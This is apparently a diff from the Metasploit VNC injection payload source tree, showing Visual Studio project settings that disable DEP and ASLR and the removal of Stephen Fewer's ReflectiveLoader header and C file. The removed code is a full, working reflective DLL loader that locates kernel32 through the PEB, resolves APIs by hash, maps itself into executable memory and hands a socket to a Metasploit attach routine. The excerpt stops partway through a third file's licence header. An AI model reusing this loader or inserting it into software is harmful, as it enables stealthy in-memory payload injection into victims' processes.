<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="context.c" />
<ClCompile Include="loader.c" />
<ClCompile Include="inject.c" />
<ClCompile Include="ps.c" />
<ClCompile Include="session.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h" />
<ClInclude Include="loader.h" />
<ClInclude Include="inject.h" />
<ClInclude Include="ps.h" />
<ClInclude Include="session.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Source Files\core">
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Header Files\core">
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="context.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="loader.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="inject.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="ps.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="session.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>Source Files\core</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="loader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="inject.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="ps.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="session.h">
<Filter>Header Files\core</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>


@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//


@ -1,457 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
/*
* Use Reflective DLL Injection.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//


@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
